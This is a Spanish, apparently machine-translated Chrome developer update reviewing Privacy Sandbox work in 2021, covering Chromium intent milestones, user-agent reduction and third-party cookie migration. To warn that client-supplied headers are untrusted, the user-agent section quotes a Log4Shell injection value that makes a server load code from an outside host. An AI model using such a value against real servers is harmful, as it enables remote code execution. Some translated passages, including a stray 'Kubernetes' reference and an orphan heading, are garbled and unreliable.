Te damos la bienvenida a la edición 2021 de resumen del progreso en la privacidad la zona de pruebas, el seguimiento de los hitos el camino para eliminar de forma gradual las cookies de terceros en Chrome la Web privada. Normalmente, compartimos una descripción general de las actualizaciones de Privacy Sandbox cronograma junto con noticias de todo el mundo proyecto, pero diciembre fue un mes tranquilo. En cambio, repasaremos algunas de las actividades a lo largo de 2021 y proporcionan algunas posibles soluciones ahora estamos en el año nuevo.
Proceso de desarrollo de Chromium
Para que una nueva función de plataforma web llegue a Chromium, debe pasar por el desarrollo abierto de cada proyecto . En 2021, el El equipo de Privacy Sandbox produjo lo siguiente:
🥚 | Intención de crear prototipos | 19 |
🧪 | Intención de experimentar | (7) |
🚀 | Intención de enviar | 11 |
Cada hito también es una invitación para que contribuya el ecosistema web más amplio.
El intento de crear un prototipo es el primer punto de control, en el que incitamos al debate. y los primeros días de experimentación. Esto significa que una propuesta estará disponible en GitHub, en el que puedes hacer una pregunta creando un Problema o unirte a debates y presentaciones en estándares grupos, como W3C y como IETF. Aquí es también donde comienza la codificación, lo que significa que podrían de prototipos esté disponible para que los desarrolladores las prueben detrás de un función marca. Los comentarios iniciales son fundamentales para la validación y la iteración de las propuestas.
El intento de experimentar es un paso opcional si queremos solicitar una prueba de origen. Los desarrolladores pueden registrarse en el origen. prueba de una función y, luego, pruébala en producción. Se llama experimento porque tenemos aspectos específicos de la función queremos validar en entornos del mundo real. Desarrolladores que pueden probar y comparte los resultados de esas pruebas y brinda comentarios valiosos para ayudar a iterar y a evolucionar la función.
Un intent to Ship es el último hito que indica que una función ya está estén completos y listos para la disponibilidad general. Una vez aprobada, la función se se combinó con un próximo lanzamiento y continúa con la versión Canary, beta y estables. Es fundamental que se asegure de probar sus sitios con los Canary y Versiones beta de Chrome para detectar y informar cualquier error antes de que una función alcance el estado estable.
Propuestas
Cada propuesta de Privacy Sandbox tiene un repositorio de GitHub complementario. R de Kubernetes aloja una explicación para resumir la funcionalidad general, una una especificación específica para la implementación por navegadores y las contribuciones de toda web en forma de problemas y solicitudes de extracción.
En 14 repositorios de Privacy Sandbox, tuvimos lo siguiente:
💬 | 545 | Se crearon los problemas |
250 | Se cerraron los problemas | |
🛠️ | 261 | Se crearon las solicitudes de extracción |
223 | Se combinaron las solicitudes de extracción |
El lenguaje de las explicaciones y especificaciones suele estar dirigido a un público con los estándares y el desarrollo de navegadores, que pueden desafiante si no estás familiarizado con él. Sin embargo, el objetivo de una explicación explicar. Si hay puntos que no son claros o que no se tratan, queremos que presentar un problema para que podamos actualizar y aclarar la explicación.
de DNS pasivo
Limpieza de primavera de usuario-agente
Mientras estábamos contando hacia abajo para Año Nuevo, también estamos contando hacia arriba para ambos Chrome 100 y la reducción incremental de la cadena usuario-agente. Este es un buen para volver a consultar el uso de la cadena usuario-agente en tu código se ve afectado por cualquiera de estos cambios.
Para encontrar esas áreas, haz lo siguiente:
- Busca
navigator.userAgent
en tu código JavaScript o accede alUser-Agent
en el código de tu servidor. - Verifica tu análisis de la cadena para ver las suposiciones sobre una versión de 2 dígitos. Para
ejemplo, una regex que especifique
\d\d
o\d{2}
debe reemplazarse por\d+
- Verifica el uso de la cadena en cualquier lugar en el que te bases:
- versión de la plataforma (sistema operativo)
- versión de compilación completa de Chrome
- nombre del dispositivo móvil
- Estos son los valores que se reducirán a cadenas fijas en el futuro. Si si necesitas acceso a estos valores, migra al cliente de usuario-agente Pistas.
Hay una actualización de diciembre para mencionar si estás adoptando el rol de cliente
Pistas: enviamos la Intent de envío para habilitar la delegación de sugerencias a otras
orígenes en
HTML
con una etiqueta <meta>
. Por ejemplo:
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
Si tienes un estado de ánimo entusiasta de la limpieza de primavera, también puedes considerar alternativas al uso del usuario-agente en su totalidad. Si estás usando la cadena para detectar dispositivos móviles e investigar si puede reemplazarlo por el diseño de tu producto. Si quieres comprobar el nombre y la versión del navegador para comprobar la compatibilidad de las funciones, consulta si en su lugar puedes usar la detección de funciones.
Siempre vale la pena recordar que el usuario-agente, como cualquier cliente proporcionado
valor, no se garantiza que sea exacto ni se proporcione. El Log4j reciente
“Log4shell”
proporciona un ejemplo de este riesgo. Un cliente que establece su cadena usuario-agente en
incluir un valor como ${jndi:ldap://example.com/file}
podría obtener un sitio
para analizarlos
de forma activa en el servidor.
Catalogación de cookies
Otra actividad tradicional de Año Nuevo
es asegurarse de estar feliz
una cantidad saludable de galletas
con ingredientes de calidad. A medida que seguimos avanzando
hacia la eliminación gradual de las cookies de terceros, debes asegurarte de conocer
qué cookies de tu sitio se verán afectadas. El 2020 fue una ventaja
se hizo necesario para marcar todas las cookies para el tráfico
usar
con SameSite=None
.
Todas las cookies en las que hayas establecido el atributo SameSite
como None
necesitarán un
actualización.
Hay tres rutas posibles que se deben considerar en este momento:
- Si la cookie solo se requiere en una relación 1:1 con el sitio de nivel superior,
luego sigue el progreso del proceso CHIPS
propuesta. Esto implicará agregar
Partitioned
a la cookie. - Si la cookie se usa en un contexto de varios sitios, pero solo entre sitios en los que
posee y administra, puede ser una candidata para el programa First-Party
Sets. Esto requiere definir
sitios del conjunto y agregar el atributo
SameParty
a la cookie. - Si la cookie se usa para proporcionar alguna forma de valor compartido entre varias investigar el conjunto más amplio de Privacy Sandbox propuestas de una solución alternativa que no dependen del seguimiento entre sitios.
Si ya se siente más saludable, este también es el momento ideal de volver a usar todas las cookies, ya que tenemos una receta para mejorar cookies propias.
Comentarios
A medida que sigamos publicando estas actualizaciones mensuales y avancemos en el Privacy Sandbox en su conjunto, queremos asegurarnos de que los desarrolladores reciban el la información y el apoyo que necesitan. Infórmanos en @ChromiumDev Twitter si hay algo que podamos mejorar en esta serie. Usaremos tus comentarios para seguir mejorando el formato.
Consulta las Preguntas frecuentes de Privacy Sandbox, que se continúa expandiéndose en función de los problemas que envíes al equipo de asistencia para desarrolladores repo. Si si tiene preguntas sobre la prueba o implementación de cualquiera de las propuestas vengan a hablar con nosotros.